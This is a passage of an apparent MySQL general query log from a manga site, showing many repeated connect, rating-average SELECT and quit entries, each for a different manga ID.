'175' order by created desc 330641752 Quit 330641753 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330641753 Quit 330641754 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330641754 Quit 330641755 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330641755 Quit 330641756 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330641756 Quit 330641757 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330641757 Quit 330641758 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330641758 Quit 330641759 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330641759 Quit 330641760 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330641760 Quit 330641761 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330641761 Quit 330641762 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330641762 Quit 330641763 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330641763 Quit 330641764 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330641764 Quit 330641765 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330641765 Quit 330641766 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330641766 Quit 330641767 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330641767 Quit 330641768 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330641768 Quit 330641769 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330641769 Quit 330641770 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330641770 Quit 330641771 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330641771 Quit 330641772 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330641772 Quit 330641773 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330641773 Quit 330641774 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330641774 Quit 330641775 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330641775 Quit 330641776 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330641776 Quit 330641777 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330641777 Quit 330641778 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330641778 Quit 330641779 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330641779 Quit 330641780 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330641780 Quit 330641781 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330641781 Quit 330641782 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330641782 Quit 330641783 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330641783 Quit 330641784 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330641784 Quit 330641785 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330641785 Quit 330641786 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330641786 Quit 330641787 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330641787 Quit 330641788 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330641788 Quit 330641789 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330641789 Quit 330641790 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330641790 Quit 330641791 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330641791 Quit 330641792 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330641792 Quit 330641793 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330641793 Quit 330641794 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330641794 Quit 330641795 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330641795 Quit 330641796 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330641796 Quit 330641797 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330641797 Quit 330641798 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330641798 Quit 330641799 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330641799 Quit 330641800 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330641800 Quit 330641801 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330641801 Quit 330641802 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330641802 Quit 330641803 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330641803 Quit 330641804 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330641804 Quit 330641805 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330641805 Quit 330641806 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330641806 Quit 330641807 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330641807 Quit 330641808 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330641808 Quit 330641809 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330641809 Quit 330641810 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330641810 Quit 330641811 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330641811 Quit 330641812 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330641812 Quit 330641813 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330641813 Quit 330641814 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330641814 Quit 330641815 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330641815 Quit 330641816 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330641816 Quit 330641817 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330641817 Quit 330641818 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330641818 Quit 330641819 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330641819 Quit 330641820 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330641820 Quit 330641821 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330641821 Quit 330641822 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330641822 Quit 330641823 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330641823 Quit 330641824 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330641824 Quit 330641825 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330641825 Quit 330641826 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330641826 Quit 330641827 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330641827 Quit 330641828 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330641828 Quit 330641829 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330641829 Quit 330641830 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330641830 Quit 330641831 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330641831 Quit 330641832 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330641832 Quit 330641833 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330641833 Quit 330641834 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330641834 Quit 330641835 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330641835 Quit 330641836 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330641836 Quit 330641837 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330641837 Quit 330641838 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330641838 Quit 330641839 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330641839 Quit 330641840 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330641840 Quit 330641841 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330641841 Quit 330641842 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330641842 Quit 330641843 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330641843 Quit 330641844 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330641844 Quit 330641845 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330641845 Quit 330641846 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330641846 Quit 330641847 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330641847 Quit 330641848 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330641848 Quit 330641849 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330641849 Quit 330641850 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330641850 Quit 330641851 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330641851 Quit 330641852 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330641852 Quit 330641853 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330641853 Quit 330641854 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330641854 Quit 330641855 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330641855 Quit 330641856 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330641856 Quit 330641857 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330641857 Quit 330641858 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330641858 Quit 330641859 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330641859 Quit 330641860 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330641860 Quit 330641861 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330641861 Quit 330641862 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330641862 Quit 330641863 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330641863 Quit 330641864 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330641864 Quit 330641865 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330641865 Quit 330641866 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330641866 Quit 330641867 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330641867 Quit 330641868 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330641868 Quit 330641869 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330641869 Quit 330641870 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330641870 Quit 330641871 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330641871 Quit 330641872 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330641872 Quit 330641873 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330641873 Quit 330641874 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330641874 Quit 330641875 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330641875 Quit 330641876 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330641876 Quit 330641877 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330641877 Quit 330641878 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330641878 Quit 330641879 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330641879 Quit 330641880 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330641880 Quit 330641881 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330641881 Quit 330641882 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330641882 Quit 330641883 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330641883 Quit 330641884 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330641884 Quit 330641885 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330641885 Quit 330641886 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330641886 Quit 330641887 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330641887 Quit 330641888 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330641888 Quit 330641889 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330641889 Quit 330641890 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330641890 Quit 330641891 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330641891 Quit 330641892 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330641892 Quit 330641893 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330641893 Quit 330641894 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330641894 Quit 330641895 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330641895 Quit 330641896 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330641896 Quit 330641897 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330641897 Quit 330641898 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330641898 Quit 330641899 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330641899 Quit 330641900 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330641900 Quit 330641901 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330641901 Quit 330641902 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330641902 Quit 330641903 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330641903 Quit 330641904 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330641904 Quit 330641905 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by 